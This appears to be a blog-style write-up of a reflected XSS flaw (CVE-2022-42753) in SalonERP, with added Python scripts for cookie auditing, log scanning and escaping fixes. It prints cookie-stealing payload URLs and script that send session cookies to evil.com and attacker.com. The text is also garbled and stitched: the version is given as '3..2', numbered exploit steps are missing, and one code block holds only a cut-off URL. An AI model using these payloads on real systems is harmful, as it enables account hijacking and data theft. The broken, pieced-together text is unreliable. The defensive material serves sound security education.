SalonERP is management software used by salons and spas to handle appointments, customers, and finances. As these businesses digitize their operations, protecting clients’ data becomes critical. Unfortunately, in late 2022 a serious vulnerability, CVE-2022-42753, was reported in its version 3..2: it exposes user data to theft through a classic web security flaw, Cross-Site Scripting (XSS).
This post will break down how the vulnerability works, show you a simple proof-of-concept exploit, and suggest what you should do next.
What Is CVE-2022-42753?
SalonERP 3..2 fails to sanitize one query parameter in particular: the page parameter in the web URL. An attacker can therefore place their own JavaScript in that parameter. Because the application neither validates nor encodes the value before echoing it back into the page, the browser runs whatever the attacker sent (a reflected XSS). One common and dangerous use of XSS like this is stealing users’ cookies, which can allow attackers to hijack accounts.
Why Are Cookies Important?
Cookies often store session tokens, meaning if an attacker grabs your cookie, they can impersonate you without needing your password. This kind of attack is silent, fast, and effective.
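As an added illustration, not part of the original post and not SalonERP's code, here is a small Python check a defender can run over a response's Set-Cookie headers. The cookie theft described in this post reads the token with document.cookie, which the HttpOnly attribute blocks; the script flags session cookies that lack it, along with missing Secure and SameSite attributes. The header values, the cookie names and the SESSION_COOKIE_NAMES list are constructed for the example (PHPSESSID is PHP's default session cookie name).

```python
from __future__ import annotations

# Constructed Set-Cookie headers as a web app like SalonERP might send; the
# cookie values are made up and the names are illustrative.
WEAK_RESPONSE = [
    "Set-Cookie: PHPSESSID=c0nstructed5ess10n; Path=/",
    "Set-Cookie: theme=dark; Path=/",
]
HARDENED_RESPONSE = [
    "Set-Cookie: PHPSESSID=c0nstructed5ess10n; Path=/; HttpOnly; Secure; SameSite=Lax",
    "Set-Cookie: theme=dark; Path=/; Secure; SameSite=Lax",
]

# Assumed names of cookies that carry a session token; these must never be
# readable from document.cookie.
SESSION_COOKIE_NAMES = {"phpsessid", "sessionid", "sid"}


def parse_set_cookie(header: str) -> tuple:
    """Split one Set-Cookie header into (cookie name, {lower-cased attribute: value})."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in body.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, value = part.partition("=")
        # Flag attributes such as HttpOnly have no value; store None for them.
        attrs[key.strip().lower()] = value.strip() or None
    return name, attrs


def audit_set_cookie(header: str) -> list:
    """Return the policy violations for one cookie (an empty list means it passes)."""
    name, attrs = parse_set_cookie(header)
    findings = []
    if name.lower() in SESSION_COOKIE_NAMES and "httponly" not in attrs:
        findings.append("session cookie lacks HttpOnly, so injected script can read it via document.cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: cookie would also be sent over plain HTTP")
    if "samesite" not in attrs:
        findings.append("missing SameSite: browser default applies, set it explicitly")
    return findings


def audit_response(headers: list) -> dict:
    """Audit every Set-Cookie header of a response; cookies that pass are omitted."""
    report = {}
    for h in headers:
        name, _ = parse_set_cookie(h)
        findings = audit_set_cookie(h)
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for label, headers in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(headers))
```

HttpOnly keeps the token out of document.cookie, but the injected script still runs inside the victim's session and can make requests on their behalf, so the attribute narrows what this XSS yields; it does not remove the XSS itself.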
How Does the Exploit Work?
When a user visits a manipulated link, the attacker’s script runs in the user’s browser. Here’s an example:
Suppose the page parameter is not checked. An attacker can craft a link like:

```
http://victim-salon.com/index.php?page=<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
```
If a user with a valid session clicks this link, their browser will run the injected code, sending their cookies to the attacker's server.
1. Crafting the Exploit Link

```
http://salonerp.local/index.php?page=<script>new Image().src="http://attacker.com/?cookie="+document.cookie</script>
```

*Note*: The attacker uses new Image() because a plain image request is less conspicuous than a fetch call and is not blocked by CORS.
Let’s simulate what the vulnerable page renders:

```html
<!-- User clicks the malicious link -->
<html>
<body>
<script>
// This runs because the app does not filter the page parameter!
new Image().src="http://attacker.com/?cookie="+document.cookie;
</script>
</body>
</html>
```
This silently sends the session cookie to attacker.com, where the attacker can reuse it to take over the session.
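The exploit above leaves a trace in the web server's access log: the page parameter arrives percent-encoded and carries a script tag. As an added example, not code from the original post, here is a Python scanner that decodes every query parameter in common-format access-log lines and flags script-injection indicators. The log lines are constructed for the example (made-up IPs, host and timestamps); the indicator list generalises beyond the script-tag payload quoted on this page to the other markers a web application firewall checks for.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines in the common Apache/Nginx format. Line 2 carries
# the cookie-theft payload quoted in the write-up, percent-encoded as a browser
# sends it; line 4 carries the alert(document.cookie) form behind the
# "pops up with your cookie" step.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Nov/2022:18:20:01 +0000] "GET /index.php?page=appointments HTTP/1.1" 200 5120
10.0.0.7 - - [03/Nov/2022:18:21:14 +0000] "GET /index.php?page=%3Cscript%3Enew%20Image().src%3D%22http%3A%2F%2Fattacker.com%2F%3Fcookie%3D%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 5300
10.0.0.9 - - [03/Nov/2022:18:22:40 +0000] "GET /index.php?page=customers&sort=name HTTP/1.1" 200 4870
10.0.0.7 - - [03/Nov/2022:18:23:02 +0000] "GET /index.php?page=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 5290
"""

# Common log format: client, ident, user, [time], "METHOD path PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of script injection in a decoded parameter value (defensive heuristics).
INDICATORS = {
    "script tag": re.compile(r"<\s*/?\s*script\b", re.IGNORECASE),
    "inline event handler": re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),
    "javascript: URL": re.compile(r"javascript\s*:", re.IGNORECASE),
    "cookie access": re.compile(r"document\s*\.\s*cookie", re.IGNORECASE),
}


def decode_param(value: str) -> str:
    """parse_qs already decoded once; decode again to catch double-encoded payloads."""
    return unquote(value)


def suspicious_requests(log_text: str) -> list:
    """Return one record per query parameter value that matches an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m["path"]).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                value = decode_param(raw)
                reasons = [label for label, rx in INDICATORS.items() if rx.search(value)]
                if reasons:
                    hits.append({"ip": m["ip"], "time": m["time"], "param": name,
                                 "reasons": reasons, "value": value})
    return hits


def offending_ips(hits: list) -> Counter:
    """Count flagged requests per client, to spot a source probing repeatedly."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = suspicious_requests(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["ip"]} param={h["param"]} -> {", ".join(h["reasons"])}')
    print(offending_ips(found))
```

Matching on the decoded value matters: the payload in the log is percent-encoded, so a raw grep for a script tag misses it, and the second decoding pass catches requests that were encoded twice to slip past a naive filter.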
Original Advisory and References
- NIST NVD Entry for CVE-2022-42753
- Exploit Database
- SalonERP Download and Info (for version context)
```
http://localhost/salon/index.php?page=
```
4. Result: The browser shows a pop-up containing your cookie. An attacker could instead send this data elsewhere.
- Update SalonERP: Patch as soon as a new version is available, or request a fix from the developers.
- Filter Inputs: Developers must sanitize and escape all untrusted user input (especially values sent in query parameters) before echoing it into a page.
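The fix called for under "Filter Inputs", and the missing check described under "What Is CVE-2022-42753?", can be shown side by side. The following is an added Python illustration, not SalonERP's code (SalonERP is a PHP application; the equivalent encoding step there is htmlspecialchars($page, ENT_QUOTES, 'UTF-8')). KNOWN_PAGES is a hypothetical routing table standing in for the real one, and the URLs are constructed from the payload quoted in the post.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical page registry standing in for SalonERP's real routing table,
# which the write-up does not show.
KNOWN_PAGES = {"dashboard", "appointments", "customers", "finances"}

# Constructed request URLs; the first carries the payload quoted in the write-up.
MALICIOUS_URL = (
    "http://salonerp.local/index.php?page="
    '<script>new Image().src="http://attacker.com/?cookie="+document.cookie</script>'
)
BENIGN_URL = "http://salonerp.local/index.php?page=appointments"
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def page_param(url: str) -> str:
    """Value of the page query parameter, URL-decoded (empty string if absent)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("page", [""])[0]


def render_vulnerable(url: str) -> str:
    """Mirror of the reported flaw: the raw parameter is concatenated into the HTML."""
    return f"<html><body><h1>Page: {page_param(url)}</h1></body></html>"


def render_escaped(url: str) -> str:
    """Fix 1, output encoding: every character with HTML meaning is encoded before it is echoed."""
    safe = html.escape(page_param(url), quote=True)
    return f"<html><body><h1>Page: {safe}</h1></body></html>"


def render_hardened(url: str) -> str:
    """Fix 2, allowlist plus encoding: only known page names are accepted, and even those are encoded."""
    page = page_param(url)
    if page not in KNOWN_PAGES:
        return "<html><body><h1>Unknown page</h1></body></html>"  # fixed text, nothing reflected
    return f"<html><body><h1>Page: {html.escape(page, quote=True)}</h1></body></html>"


def has_live_script(rendered: str) -> bool:
    """True if the response body still contains an unencoded <script> tag."""
    return SCRIPT_TAG.search(rendered) is not None


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("escaped", render_escaped),
                          ("hardened", render_hardened)):
        body = render(MALICIOUS_URL)
        print(f"{label:10} live script: {has_live_script(body)}  body: {body}")
```

Output encoding alone (render_escaped) already closes this hole. Because page selects which view to load, an allowlist is the natural primary check for it, and keeping the encoding step as well means neither defence depends on the other being right.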
Closing Thoughts
CVE-2022-42753 is a classic—but devastating—XSS vulnerability. It proves that even popular business software can have simple, overlooked bugs with big security consequences. If you use SalonERP or similar web apps, always keep your software up to date, and urge your vendors to take security seriously.
Stay safe. Patch early. Don’t let your cookies crumble!
*Exclusive write-up by AI, built from public security advisories. If you see this vulnerability unpatched, contact the vendor and spread awareness.*
Timeline
Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 19:24:00 UTC